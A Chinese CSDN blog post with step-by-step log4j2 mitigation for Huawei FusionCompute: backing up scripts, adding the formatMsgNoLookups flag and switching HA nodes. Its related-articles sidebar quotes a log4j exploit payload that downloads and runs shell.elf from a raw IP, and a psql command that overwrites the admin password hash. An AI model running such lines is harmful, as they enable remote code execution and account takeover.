Huawei FusionCompute产品的log4j2漏洞规避指导

最新推荐文章于 2024-05-05 15:35:06 发布
最新推荐文章于 2024-05-05 15:35:06 发布
阅读量1.3k 收藏
点赞数
分类专栏: 安全 文章标签: 华为 log4j2 kvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shoulham/article/details/121944162
版权

**

Huawei FusionCompute产品的log4j2漏洞规避指导

**

【涉及版本】

FusionCompute版本号>=6.5.0

【漏洞修补措施】

需要通过ssh工具登录VRM管理节点,请提前准备好gandalf和root账号密码

1. 使用ssh工具登录VRM备节点,执行以下命令备份相关脚本

cp -a /opt/galax/vrm/om/analyzer/bin/service.sh /opt/galax/vrm/om/analyzer/bin/service.sh.bak
cp -a /opt/galax/vrm/om/cep/bin/service.sh /opt/galax/vrm/om/cep/bin/service.sh.bak 
cp -a /opt/galax/vrm/om/fms/bin/service.sh /opt/galax/vrm/om/fms/bin/service.sh.bak
cp -a /opt/galax/vrm/om/notifysvr-s/bin/service.sh /opt/galax/vrm/om/notifysvr-s/bin/service.sh.bak
cp -a /opt/galax/vrm/om/pmc/bin/service.sh /opt/galax/vrm/om/pmc/bin/service.sh.bak
cp -a /etc/galax/portal/conf/catalina.sh /etc/galax/portal/conf/catalina.sh.bak
cp -a /opt/galax/vrm/tomcat/bin/catalina.sh /opt/galax/vrm/tomcat/bin/catalina.sh.bak

如果当前版本为8.1.1,需要同时备份start_sftp.sh,其他版本不涉及:

cp -a /opt/galax/vrm/om/sftp/bin/start_sftp.sh /opt/galax/vrm/om/sftp/bin/start_sftp.sh.bak

2. 打开并修改/etc/galax/portal/conf/catalina.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true)
在这里插入图片描述
3. 打开并修改/opt/galax/vrm/om/pmc/bin/service.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true)

在这里插入图片描述
4. 打开并修改/opt/galax/vrm/om/notifysvr-s/bin/service.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true):
在这里插入图片描述

5. 打开并修改/opt/galax/vrm/om/fms/bin/service.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true):
在这里插入图片描述

6. 打开并修改/opt/galax/vrm/om/cep/bin/service.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true):
在这里插入图片描述

7. 打开并修改/opt/galax/vrm/om/analyzer/bin/service.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true):
在这里插入图片描述

8. 打开并修改/opt/galax/vrm/tomcat/bin/catalina.sh,添加以下内容(-Dlog4j2.formatMsgNoLookups=true):

  1. 当前环境为6.5.0或6.5.1版本(包含补丁版本)

在这里插入图片描述

  1. 当前版本为8.0.0及之后版本**

在这里插入图片描述

9. (该步骤仅需要在8.1.1版本执行,其他版本不涉及)修改/opt/galax/vrm/om/sftp/bin/start_sftp.sh,添加红框中标注的内容(LOGGING_CONFIG=”-Dlog4j2.formatMsgNoLookups=true”):
在这里插入图片描述

10. 使用ssh工具登录VRM主节点,重复执行步骤1-9

11. 切换到root用户,在VRM主节点执行以下命令进行主备倒换(注:主备倒换过程中需要确保环境中没有运行中的任务,该步骤备节点不需要执行)。

sh /opt/galax/gms/common/ha/switchOverHA.sh
shoulham
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LOG4J2 mdc配置
12-17
LOG4J2的生产环境配置配置案例: 4.日志滚动,避免单个日志过大,可以按小时进行日志分割. %d %p %c{1.} [%t] %m%n
log4j漏洞复现
xxx_678的博客
03-18 1275
加粗字体解码后:wget http://123.56.136.50/ccccc/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf。https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip //github下载地址。视频地址:https://www.youtube.com/watch?
Web网络安全-----Log4j高危漏洞原理及修复
热门推荐
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
漏洞复现----7、FusionAuth 远程命令执行漏洞(CVE-2020-7799)
七天
11-24 1471
文章目录一、漏洞简介1、FusionAuth2、Apache FreeMarker3、漏洞描述二、漏洞复现 一、漏洞简介 1、FusionAuth FusionAuth是一个免费的身份管理平台,安装简单,易于集成。FusionAuth提供登录、注册、MFA、SSO、电子邮件模板、本地化、密码控制、强哈希、网络挂钩、基于角色的访问控制等功能。 2、Apache FreeMarker FreeMarker是一款模板引擎:即一种基于模板和要改变的数据,并用来生成输出文本(HTML网页,电子邮件,配置文件,源代
怎么解决Log4j漏洞处理方式
棒槌沟
12-16 1347
解决Log4j漏洞处理方式
华为云计算FusionCompute8 8.0.1 8.0.1.SPH2 FusionSphere8 全套资源
12-25
FusionComputeUpdateTool_8.0.1.SPH2.zip------------- FusionCompute8.0.1.SPH2升级工具 FusionCompute_GpuCompiler-8.0.0-X86_64.zip ---------- 8.0.0 GPU升级包 FusionCompute_VncViewer-8.0.0.zip -------- VNC...
华为fusioncompute配置笔记.pdf
06-12
华为FusionCompute配置详解》 华为FusionCompute是一款企业级的云计算管理平台,它能够实现虚拟化资源的高效管理和调度。本配置笔记主要涵盖了FusionCompute中的几个关键配置环节,包括主机HBA卡的WWN号查看、...
FusionCompute安装流程
02-23
华为FusionCompute是一款基于云计算技术的虚拟化平台,它提供了计算、存储、网络资源的统一管理,为企业构建高效、灵活的数据中心提供了强大的支撑。在安装FusionCompute 8.0.0版本时,主要涉及两个核心组件:CNA...
FusionCompute 8.0 资源
10-20
文本文件内附百度网盘连接及提取码。 以及详细资源列表,方便学习使用。...本资源适合搭建FusionCompute实验环境。 资源包含几乎全部FusionCompute8.0组件。 资源绝对真实,童叟无欺,如若妄言,天打雷劈!
华为FusionCompute主机和集群管理指南.pdf
10-11
"华为FusionCompute主机和集群管理指南" 本文档提供了FusionCompute中主机和集群资源的创建、调整和回收的流程和方法,并提供主机和集群相关功能的配置方法,帮助管理员对FusionCompute的主机和集群资源进行管理。 ...
VMware Fusion 权限提升漏洞(CVE-2020-3950)复现
玄道的网安博客
03-19 483
简介 VMware Fusion是美国威睿(VMware)公司的一套专用于在苹果机(Mac)上运行Windows应用程序的的虚拟机软件。 影响版本 VMware Fusion < 11.5.2 VMware Remote Console for Mac <= 11.x VMware Horizon Client for Mac < 5.4.0 漏洞复现 这里用VMware Fusion11.0.0版本进行测试 Poc #!/bin/b...
PHPFusion 开源 CMS 中存在严重漏洞
smellycat000的专栏
09-06 255
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全研究员在广泛使用的开源内容管理系统 PHPFusion CMS 中发现了一个严重漏洞,目前尚无补丁。该漏洞是一个验证的本地文件包含漏洞,编号为CVE-2023-2453。如攻击者可在目标系统的一个已知路径上上传恶意构造的 “.php” 文件,则可导致远程代码执行后果。这是新思公司最近在 PHPFusion 中发现的两个漏洞之一。另外一个漏洞是...
升级过log4j,却还没搞懂log4j漏洞的本质?
华为云官方博客
12-21 4764
摘要:log4j远程代码漏洞问题被大范围曝光后已经有一段时间了,今天完整讲清JNDI和RMI以及该漏洞的深层原因。
华为FusionCompute 8.x部署文档
最新发布
Jian Sun_的博客
05-05 617
注:仲裁IP地址用于判断主备VRM节点活动状态的IP地址,至少填写一个,最多填写3个。建议将第一个仲裁IP地址配置为管理平面的网关,其他仲裁IP地址配置为与管理平面互通的全局服务器的IP地址,如AD域服务器、DNS服务器。开始配置VRM节点主备关系。配置IP地址池和各用户密码,点击“配置服务”按钮,完成后点击下一步。输入swap分区大小,地址池,及各用户密码,点击“录入节点信息”选择主备节点,并输入节点root密码,点击“开始安装VRM”执行以下命令,vrmInit,“I”为“i”的大写。
Huawei FusionCompute安装体验
weixin_34357436的博客
12-15 891
DELL PE M620安装Huawei FusionCompute虚拟化安装介质:FusionCompute_V100R003C10SPC600_CNA.iso FusionCompute_V100R003C10SPC600_VRM.zip FusionCompute_V100R003C10SPC600_Tools.zip参考:http://suppor...
fusioncompute6.0更改web端管理系统密码
u012418429的博客
06-09 4339
1.使用软件putty,通过gandalf用户登录到主VRM,切到root账户 2.执行命令 psql -u galax vrm -c "update sm.tbl_user set password='e1f138840253cd1572239d5db3c1d825XR1K/D78da02' where username='admin' and usertype='0'; " 3.会提示输入密码 SingleLOUD!1 ,admin密码就重置为 Huawei@CL...
华为Fusion Compute启动故障
changgen_nb1的博客
06-03 2355
华为FusionCompute启动失败,与主机网关通信故障
一篇文章带你玩转华为FusionCompute云计算产品
极客不撩妹
05-06 5582
前言 本文主要介绍FusionSphere虚拟化套件与相关产品概念,以及FusionCompute产品与安装。通过本文的学习,你将了解到华为FusionSphere产品组成架构,熟悉华为FusionCompute产品安装规划及安装方法。 FusionSphere虚拟化套件介绍 虚拟化 - 云软件的基石 虚拟化就是云计算的基础。虚拟化就是通过虚拟化技术把一台计算机虚拟化成多台逻辑计算机,每个逻辑计算...
FusionCompute8.0.0实验(1)CNA及VRM安装
博客
10-03 9798
准备:1.老旧华硕笔记本电脑用于安装CNA(内存8G,硬盘1T+24G固态,i7-4500u 2核4线程) 2. USB光驱(电脑上的光驱坏了,CNA不支持U盘安装)+5V2A外接适配器(不能用快充) 3. ultroISO破解版 4. 办公笔记本(16GB,i5-10300H,512GB固态) 下载CNA:华为官网下载 FusionCompute_CNA-8.0.0-X86_64.iso FusionCompute_VRM-...
华为fusioncompute产品文档
08-31
华为FusionCompute是一种多云计算虚拟化解决方案,提供了一种高可用性、灵活性和可扩展性的虚拟化环境。华为FusionCompute产品文档是关于该产品的详细说明和指南,帮助用户了解产品的功能和使用方法。 华为FusionCompute产品文档包含了以下内容: 1. 产品概述:介绍了FusionCompute的定义、特性和优势,帮助用户了解产品的基本情况。 2. 功能介绍:详细介绍了FusionCompute的各项功能,包括虚拟机管理、资源调度、高可用性、虚拟网络等,帮助用户了解产品的功能特点。 3. 部署指南:提供了关于FusionCompute的安装和配置步骤,包括硬件和软件要求、网络设置、安装过程等,帮助用户正确进行产品的部署。 4. 用户手册:提供了用户操作FusionCompute的详细指南,包括虚拟机创建、网络配置、存储管理等,帮助用户快速上手使用产品。 5. 故障排除:提供了常见故障的排除方法和解决方案,帮助用户快速解决在使用过程中遇到的问题。 华为FusionCompute产品文档的目的是帮助用户了解和使用产品,提供了全面的指南和说明,以满足用户在部署和管理虚拟化环境中的需求。该文档的质量和准确性对于用户有效地使用FusionCompute具有重要意义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值